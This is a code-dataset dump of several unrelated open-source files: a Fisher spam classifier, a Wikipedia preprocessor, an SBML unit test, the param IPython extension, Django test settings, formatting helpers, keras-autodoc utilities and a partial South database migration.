repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
piyushkant/Spam-Filter-Machine-Learning
|
spamfilter/fisher.py
|
1
|
2184
|
#####################################################
# Copyright (c) 2012 Piyush Kant #
# See the file license.txt for copying permission #
#####################################################
import classifier
import math
class fisherclassifier(classifier.classifier):
def __init__(self, getFeatures):
classifier.classifier.__init__(self, getFeatures)
self.minimum = {}
#Pr(category|feature)
def cProb(self, feat, cat):
# The frequency of this feature in this category
fp = self.featProb(feat, cat)
if fp == 0:
return 0
# The frequency of this feature in all the categories
freqSum = sum([self.featProb(feat, c) for c in self.catList()])
# The probability is the frequency in this category divided by the overall frequency
p = fp / freqSum
return p
def fisherProb(self, item, cat):
# Multiply all the probabilities together
p = 1
features = self.getFeatures(item)
for feat in features:
p *= (self.weightedProb(feat, cat, self.cProb))
# Take the natural log and multiply by -2
fscore = -2 * math.log(p)
# Use the inverse chi2 function to get a probability
return self.invchi2(fscore, len(features) * 2)
def invchi2(self, chi, df):
m = chi / 2.0
sum = term = math.exp(-m)
for i in range(1, df // 2):
term *= m / i
sum += term
return min(sum, 1.0)
def setMinimum(self, cat, min):
self.minimum[cat] = min
def getMinimum(self, cat):
if cat not in self.minimum:
return 0
return self.minimum[cat]
def classify(self, item, default=None):
# Loop through looking for the best result
best = default
max = 0.0
for c in self.catList():
p = self.fisherProb(item, c)
# Make sure it exceeds its minimum
if p > self.getMinimum(c) and p > max:
best = c
max = p
return best
|
mit
| -6,822,964,227,045,991,000
| 28.931507
| 92
| 0.514652
| false
| 4.324752
| false
| false
| false
|
google-research/language
|
language/orqa/preprocessing/wiki_preprocessor.py
|
1
|
3798
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Preprocessor class that extract creates a database of text blocks.
Each input line should have the following JSON format:
```
{
"title": "Document Tile",
"text": "This is a full document."
}
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import re
import six
import tensorflow.compat.v1 as tf
def add_int64_feature(key, values, example):
example.features.feature[key].int64_list.value.extend(values)
class Preprocessor(object):
"""Preprocessor."""
def __init__(self, sentence_splitter, max_block_length, tokenizer):
self._tokenizer = tokenizer
self._sentence_splitter = sentence_splitter
self._max_block_length = max_block_length
tf.logging.info("Max block length {}".format(self._max_block_length))
def generate_sentences(self, title, text):
"""Generate sentences in each block from text."""
title_length = len(self._tokenizer.tokenize(title))
current_token_count = 0
current_block_sentences = []
for sentence in self._sentence_splitter.tokenize(text):
num_tokens = len(self._tokenizer.tokenize(sentence))
# Hypothetical sequence [CLS] <title> [SEP] <current> <next> [SEP].
hypothetical_length = 3 + title_length + current_token_count + num_tokens
if hypothetical_length <= self._max_block_length:
current_token_count += num_tokens
current_block_sentences.append(sentence)
else:
yield current_block_sentences
current_token_count = num_tokens
current_block_sentences = []
current_block_sentences.append(sentence)
if current_block_sentences:
yield current_block_sentences
def create_example(self, title, sentences):
"""Create example."""
title_tokens = self._tokenizer.tokenize(title)
title_ids = self._tokenizer.convert_tokens_to_ids(title_tokens)
token_ids = []
sentence_starts = []
for sentence in sentences:
sentence_starts.append(len(token_ids))
sentence_tokens = self._tokenizer.tokenize(sentence)
token_ids.extend(self._tokenizer.convert_tokens_to_ids(sentence_tokens))
example = tf.train.Example()
add_int64_feature("title_ids", title_ids, example)
add_int64_feature("token_ids", token_ids, example)
add_int64_feature("sentence_starts", sentence_starts, example)
return example.SerializeToString()
def generate_block_info(self, title, text):
for sentences in self.generate_sentences(title, text):
if sentences:
block = " ".join(sentences)
example = self.create_example(title, sentences)
yield title, block, example
def remove_doc(title):
return re.match(r"(List of .+)|"
r"(Index of .+)|"
r"(Outline of .+)|"
r"(.*\(disambiguation\).*)", title)
def example_from_json_line(line, html_parser, preprocessor):
if not isinstance(line, six.text_type):
line = line.decode("utf-8")
data = json.loads(line)
title = data["title"]
if not remove_doc(title):
text = html_parser.unescape(data["text"])
for info in preprocessor.generate_block_info(title, text):
yield info
|
apache-2.0
| -1,051,289,272,584,799,600
| 34.495327
| 79
| 0.688784
| false
| 3.824773
| false
| false
| false
|
JuBra/GEMEditor
|
GEMEditor/rw/test/test_units_rw.py
|
1
|
1230
|
from GEMEditor.rw.units import add_unit_definitions
from lxml.etree import Element
from GEMEditor.rw import *
class TestAddUnitsDefinition:
def test_node_addition(self):
root = Element("root")
add_unit_definitions(root)
list_of_unitdefinitions_node = root.find(sbml3_listOfUnitDefinitions)
assert list_of_unitdefinitions_node is not None
assert len(list_of_unitdefinitions_node) == 1
unit_definition_node = list_of_unitdefinitions_node.find(sbml3_unitDefinition)
assert unit_definition_node is not None
assert unit_definition_node.get("id") == "mmol_per_gDW_per_hr"
list_of_units_node = unit_definition_node.find(sbml3_listOfUnits)
assert list_of_units_node is not None
assert len(list_of_units_node) == 3
expected_values = set([("1", "mole", "1", "-3"),
("-1", "gram", "1", "0"),
("-1", "second", "3600", "0")])
found_set = set()
for child in list_of_units_node.iterfind(sbml3_unit):
found_set.add((child.get("exponent"), child.get("kind"), child.get("multiplier"), child.get("scale")))
assert expected_values == found_set
|
gpl-3.0
| 2,451,616,240,589,040,000
| 37.46875
| 114
| 0.615447
| false
| 3.617647
| false
| false
| false
|
ceball/param
|
param/ipython.py
|
1
|
12580
|
"""
Optional IPython extension for working with Parameters.
This extension offers extended but completely optional functionality
for IPython users. From within IPython, it may be loaded using:
%load_ext param.ipython
This will register the %params line magic to allow easy inspection of
all the parameters defined on a parameterized class or object:
%params <parameterized class or object>
All parameters of the class or object will be listed in the IPython
pager together with all their corresponding attributes and
docstrings. Note that the class or object to be inspected must already
exist in the active namespace.
"""
__author__ = "Jean-Luc Stevens"
import re
import textwrap
import param
# Whether to generate warnings when misformatted docstrings are found
WARN_MISFORMATTED_DOCSTRINGS = False
# ANSI color codes for the IPython pager
red = '\x1b[1;31m%s\x1b[0m'
blue = '\x1b[1;34m%s\x1b[0m'
green = '\x1b[1;32m%s\x1b[0m'
cyan = '\x1b[1;36m%s\x1b[0m'
class ParamPager(object):
"""
Callable class that displays information about the supplied
Parameterized object or class in the IPython pager.
"""
def __init__(self, metaclass=False):
"""
If metaclass is set to True, the checks for Parameterized
classes objects are disabled. This option is for use in
ParameterizedMetaclass for automatic docstring generation.
"""
# Order of the information to be listed in the table (left to right)
self.order = ['name', 'changed', 'value', 'type', 'bounds', 'mode']
self.metaclass = metaclass
def get_param_info(self, obj, include_super=True):
"""
Get the parameter dictionary, the list of modifed parameters
and the dictionary or parameter values. If include_super is
True, parameters are also collected from the super classes.
"""
params = dict(obj.param.objects('existing'))
if isinstance(obj,type):
changed = []
val_dict = dict((k,p.default) for (k,p) in params.items())
self_class = obj
else:
changed = [name for (name,_) in obj.param.get_param_values(onlychanged=True)]
val_dict = dict(obj.param.get_param_values())
self_class = obj.__class__
if not include_super:
params = dict((k,v) for (k,v) in params.items()
if k in self_class.__dict__)
params.pop('name') # Already displayed in the title.
return (params, val_dict, changed)
def param_docstrings(self, info, max_col_len=100, only_changed=False):
"""
Build a string to that presents all of the parameter
docstrings in a clean format (alternating red and blue for
readability).
"""
(params, val_dict, changed) = info
contents = []
displayed_params = {}
for name, p in params.items():
if only_changed and not (name in changed):
continue
displayed_params[name] = p
right_shift = max(len(name) for name in displayed_params.keys())+2
for i, name in enumerate(sorted(displayed_params)):
p = displayed_params[name]
heading = "%s: " % name
unindented = textwrap.dedent("< No docstring available >" if p.doc is None else p.doc)
if (WARN_MISFORMATTED_DOCSTRINGS
and not unindented.startswith("\n") and len(unindented.splitlines()) > 1):
param.main.warning("Multi-line docstring for %r is incorrectly formatted "
" (should start with newline)", name)
# Strip any starting newlines
while unindented.startswith("\n"):
unindented = unindented[1:]
lines = unindented.splitlines()
if len(lines) > 1:
tail = ['%s%s' % (' ' * right_shift, line) for line in lines[1:]]
all_lines = [ heading.ljust(right_shift) + lines[0]] + tail
elif len(lines) == 1:
all_lines = [ heading.ljust(right_shift) + lines[0]]
else:
all_lines = []
if i % 2: # Alternate red and blue for docstrings
contents.extend([red %el for el in all_lines])
else:
contents.extend([blue %el for el in all_lines])
return "\n".join(contents)
def _build_table(self, info, order, max_col_len=40, only_changed=False):
"""
Collect the information about parameters needed to build a
properly formatted table and then tabulate it.
"""
info_dict, bounds_dict = {}, {}
(params, val_dict, changed) = info
col_widths = dict((k,0) for k in order)
for name, p in params.items():
if only_changed and not (name in changed):
continue
constant = 'C' if p.constant else 'V'
readonly = 'RO' if p.readonly else 'RW'
allow_None = ' AN' if hasattr(p, 'allow_None') and p.allow_None else ''
mode = '%s %s%s' % (constant, readonly, allow_None)
info_dict[name] = {'name': name, 'type':p.__class__.__name__,
'mode':mode}
if hasattr(p, 'bounds'):
lbound, ubound = (None,None) if p.bounds is None else p.bounds
mark_lbound, mark_ubound = False, False
# Use soft_bounds when bounds not defined.
if hasattr(p, 'get_soft_bounds'):
soft_lbound, soft_ubound = p.get_soft_bounds()
if lbound is None and soft_lbound is not None:
lbound = soft_lbound
mark_lbound = True
if ubound is None and soft_ubound is not None:
ubound = soft_ubound
mark_ubound = True
if (lbound, ubound) != (None,None):
bounds_dict[name] = (mark_lbound, mark_ubound)
info_dict[name]['bounds'] = '(%s, %s)' % (lbound, ubound)
value = repr(val_dict[name])
if len(value) > (max_col_len - 3):
value = value[:max_col_len-3] + '...'
info_dict[name]['value'] = value
for col in info_dict[name]:
max_width = max([col_widths[col], len(info_dict[name][col])])
col_widths[col] = max_width
return self._tabulate(info_dict, col_widths, changed, order, bounds_dict)
def _tabulate(self, info_dict, col_widths, changed, order, bounds_dict):
"""
Returns the supplied information as a table suitable for
printing or paging.
info_dict: Dictionary of the parameters name, type and mode.
col_widths: Dictionary of column widths in characters
changed: List of parameters modified from their defaults.
order: The order of the table columns
bound_dict: Dictionary of appropriately formatted bounds
"""
contents, tail = [], []
column_set = set(k for row in info_dict.values() for k in row)
columns = [col for col in order if col in column_set]
title_row = []
# Generate the column headings
for i, col in enumerate(columns):
width = col_widths[col]+2
col = col.capitalize()
formatted = col.ljust(width) if i == 0 else col.center(width)
title_row.append(formatted)
contents.append(blue % ''.join(title_row)+"\n")
# Format the table rows
for row in sorted(info_dict):
row_list = []
info = info_dict[row]
for i,col in enumerate(columns):
width = col_widths[col]+2
val = info[col] if (col in info) else ''
formatted = val.ljust(width) if i==0 else val.center(width)
if col == 'bounds' and bounds_dict.get(row,False):
(mark_lbound, mark_ubound) = bounds_dict[row]
lval, uval = formatted.rsplit(',')
lspace, lstr = lval.rsplit('(')
ustr, uspace = uval.rsplit(')')
lbound = lspace + '('+(cyan % lstr) if mark_lbound else lval
ubound = (cyan % ustr)+')'+uspace if mark_ubound else uval
formatted = "%s,%s" % (lbound, ubound)
row_list.append(formatted)
row_text = ''.join(row_list)
if row in changed:
row_text = red % row_text
contents.append(row_text)
return '\n'.join(contents+tail)
def __call__(self, param_obj):
"""
Given a Parameterized object or class, display information
about the parameters in the IPython pager.
"""
title = None
if not self.metaclass:
parameterized_object = isinstance(param_obj, param.Parameterized)
parameterized_class = (isinstance(param_obj,type)
and issubclass(param_obj,param.Parameterized))
if not (parameterized_object or parameterized_class):
print("Object is not a Parameterized class or object.")
return
if parameterized_object:
# Only show the name if not autogenerated
class_name = param_obj.__class__.__name__
default_name = re.match('^'+class_name+'[0-9]+$', param_obj.name)
obj_name = '' if default_name else (' %r' % param_obj.name)
title = 'Parameters of %r instance%s' % (class_name, obj_name)
if title is None:
title = 'Parameters of %r' % param_obj.name
heading_line = '=' * len(title)
heading_text = "%s\n%s\n" % (title, heading_line)
param_info = self.get_param_info(param_obj, include_super=True)
if not param_info[0]:
return "%s\n%s" % ((green % heading_text), "Object has no parameters.")
table = self._build_table(param_info, self.order, max_col_len=40,
only_changed=False)
docstrings = self.param_docstrings(param_info, max_col_len=100, only_changed=False)
dflt_msg = "Parameters changed from their default values are marked in red."
top_heading = (green % heading_text)
top_heading += "\n%s" % (red % dflt_msg)
top_heading += "\n%s" % (cyan % "Soft bound values are marked in cyan.")
top_heading += '\nC/V= Constant/Variable, RO/RW = ReadOnly/ReadWrite, AN=Allow None'
heading_text = 'Parameter docstrings:'
heading_string = "%s\n%s" % (heading_text, '=' * len(heading_text))
docstring_heading = (green % heading_string)
return "%s\n\n%s\n\n%s\n\n%s" % (top_heading, table, docstring_heading, docstrings)
message = """Welcome to the param IPython extension! (https://param.holoviz.org/)"""
message += '\nAvailable magics: %params'
_loaded = False
def load_ipython_extension(ip, verbose=True):
from IPython.core.magic import Magics, magics_class, line_magic
from IPython.core import page
@magics_class
class ParamMagics(Magics):
"""
Implements the %params line magic used to inspect the parameters
of a parameterized class or object.
"""
def __init__(self, *args, **kwargs):
super(ParamMagics, self).__init__(*args, **kwargs)
self.param_pager = ParamPager()
@line_magic
def params(self, parameter_s='', namespaces=None):
"""
The %params line magic accepts a single argument which is a
handle on the parameterized object to be inspected. If the
object can be found in the active namespace, information about
the object's parameters is displayed in the IPython pager.
Usage: %params <parameterized class or object>
"""
if parameter_s=='':
print("Please specify an object to inspect.")
return
# Beware! Uses IPython internals that may change in future...
obj = self.shell._object_find(parameter_s)
if obj.found is False:
print("Object %r not found in the namespace." % parameter_s)
return
page.page(self.param_pager(obj.obj))
if verbose: print(message)
global _loaded
if not _loaded:
_loaded = True
ip.register_magics(ParamMagics)
|
bsd-3-clause
| -6,385,748,612,119,651,000
| 36.891566
| 98
| 0.570032
| false
| 4.084416
| false
| false
| false
|
nimbis/cmsplugin-forms-builder
|
tests/settings.py
|
1
|
5042
|
DEBUG = True
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': ':memory:',
'TEST_NAME': ':memory:',
},
}
# Hosts/domain names that are valid for this site; required if DEBUG is False
# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts
ALLOWED_HOSTS = []
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale.
USE_L10N = True
# If you set this to False, Django will not use timezone-aware datetimes.
USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/var/www/example.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://example.com/media/", "http://media.example.com/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/var/www/example.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://example.com/static/", "http://static.example.com/"
STATIC_URL = '/static/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = '6e-b#&0y4mbwu=)hx7a899p(k+i48(p)@e@^aal8^$pn1xqk$$'
MIDDLEWARE = [
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
# Uncomment the next line for simple clickjacking protection:
# 'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'tests.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'cmsplugin_forms_builder.wsgi.application'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'OPTIONS': {
'debug': DEBUG,
'context_processors': [
'django.core.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
},
},
]
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'menus',
'treebeard',
'cms',
'forms_builder.forms',
'cmsplugin_forms_builder',
'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
TEST_RUNNER = 'django.test.runner.DiscoverRunner'
|
bsd-3-clause
| 4,226,599,500,157,421,000
| 30.710692
| 79
| 0.672154
| false
| 3.710081
| false
| false
| false
|
Ikusaba-san/Chiaki-Nanami
|
cogs/utils/formats.py
|
1
|
1363
|
import functools
import re
from more_itertools import one
def pluralize(**thing):
name, value = one(thing.items())
if name.endswith('y') and name[-2] not in 'aeiou':
name = f'{name[:-1]}ies' if value != 1 else name
return f'{value} {name}'
return f'{value} {name}{"s" * (value != 1)}'
def human_join(iterable, delim=', ', *, final='and'):
"""Joins an iterable in a human-readable way.
The items are joined such that the last two items will be joined with a
different delimiter than the rest.
"""
seq = tuple(iterable)
if not seq:
return ''
return f"{delim.join(seq[:-1])} {final} {seq[-1]}" if len(seq) != 1 else seq[0]
def multi_replace(string, replacements):
substrs = sorted(replacements, key=len, reverse=True)
pattern = re.compile("|".join(map(re.escape, substrs)))
return pattern.sub(lambda m: replacements[m.group(0)], string)
_markdown_replacements = {c: f'\\{c}' for c in ('*', '`', '_', '~', '\\')}
escape_markdown = functools.partial(multi_replace, replacements=_markdown_replacements)
del _markdown_replacements
def truncate(s, length, placeholder):
return (s[:length] + placeholder) if len(s) > length + len(placeholder) else s
def bold_name(thing, predicate):
name = str(thing)
return f'**{escape_markdown(name)}**' if predicate(thing) else name
|
mit
| -345,050,366,121,900,900
| 29.288889
| 87
| 0.641966
| false
| 3.433249
| false
| false
| false
|
keras-team/keras-autodoc
|
keras_autodoc/gathering_members.py
|
1
|
4181
|
import inspect
from inspect import isclass, isfunction, isroutine
from typing import List
from .utils import import_object
def get_classes(module,
exclude: List[str] = None,
return_strings: bool = True):
"""Get all the classes of a module.
# Arguments
module: The module to fetch the classes from. If it's a
string, it should be in the dotted format. `'keras.layers'` for example.
exclude: The names which will be excluded from the returned list. For
example, `get_classes('keras.layers', exclude=['Dense', 'Conv2D'])`.
return_strings: If False, the actual classes will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of classes.
"""
return _get_all_module_element(module, exclude, return_strings, True)
def get_functions(module,
exclude: List[str] = None,
return_strings: bool = True):
"""Get all the functions of a module.
# Arguments
module: The module to fetch the functions from. If it's a
string, it should be in the dotted format. `'keras.backend'` for example.
exclude: The names which will be excluded from the returned list. For
example, `get_functions('keras.backend', exclude=['max'])`.
return_strings: If False, the actual functions will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of functions.
"""
return _get_all_module_element(module, exclude, return_strings, False)
def get_methods(cls, exclude=None, return_strings=True):
"""Get all the method of a class.
# Arguments
cls: The class to fetch the methods from. If it's a
string, it should be in the dotted format. `'keras.layers.Dense'`
for example.
exclude: The names which will be excluded from the returned list. For
example, `get_methods('keras.Model', exclude=['save'])`.
return_strings: If False, the actual methods will be returned. Note that
if you use aliases when building your docs, you should use strings.
This is because the computed signature uses
`__name__` and `__module__` if you don't provide a string as input.
# Returns
A list of strings or a list of methods.
"""
if isinstance(cls, str):
cls_str = cls
cls = import_object(cls)
else:
cls_str = f'{cls.__module__}.{cls.__name__}'
exclude = exclude or []
methods = []
for _, method in inspect.getmembers(cls, predicate=isroutine):
if method.__name__[0] == "_" or method.__name__ in exclude:
continue
if return_strings:
methods.append(f'{cls_str}.{method.__name__}')
else:
methods.append(method)
return methods
def _get_all_module_element(module, exclude, return_strings, class_):
if isinstance(module, str):
module = import_object(module)
exclude = exclude or []
module_data = []
for name in dir(module):
module_member = getattr(module, name)
if not (isfunction(module_member) or isclass(module_member)):
continue
if name[0] == "_" or name in exclude:
continue
if module.__name__ not in module_member.__module__:
continue
if module_member in module_data:
continue
if class_ and not isclass(module_member):
continue
if not class_ and not isfunction(module_member):
continue
if return_strings:
module_data.append(f'{module.__name__}.{name}')
else:
module_data.append(module_member)
module_data.sort(key=id)
return module_data
|
apache-2.0
| -592,158,582,117,040,500
| 36
| 85
| 0.610859
| false
| 4.35975
| false
| false
| false
|
ParsonsAMT/Myne
|
datamining/apps/profiles/migrations/0006_auto__add_courseimage.py
|
1
|
20722
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CourseImage'
db.create_table('profiles_courseimage', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('created_at', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('updated_at', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('created_by', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], blank=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('image', self.gf('django.db.models.fields.files.ImageField')(max_length=100)),
('course', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['profiles.Course'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255)),
('author', self.gf('django.db.models.fields.CharField')(max_length=255)),
))
db.send_create_signal('profiles', ['CourseImage'])
def backwards(self, orm):
# Deleting model 'CourseImage'
db.delete_table('profiles_courseimage')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'profiles.course': {
'Meta': {'object_name': 'Course'},
'attributes': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'coursenumber': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'credits': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'format': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'learning_outcomes': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'levels': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'method': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'prerequisite': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'subject': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Subject']"}),
'tags': ('tagging.fields.TagField', [], {}),
'timeline': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.courseimage': {
'Meta': {'object_name': 'CourseImage'},
'author': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'course': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.Course']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
'profiles.division': {
'Meta': {'object_name': 'Division'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.expertise': {
'Meta': {'object_name': 'Expertise'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'created_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'profiles.facultymember': {
'Meta': {'object_name': 'FacultyMember', '_ormbases': ['profiles.Person']},
'academic_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'admin_title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'expertise': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['profiles.Expertise']", 'null': 'True', 'blank': 'True'}),
'homeschool': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['profiles.School']", 'null': 'True', 'blank': 'True'}),
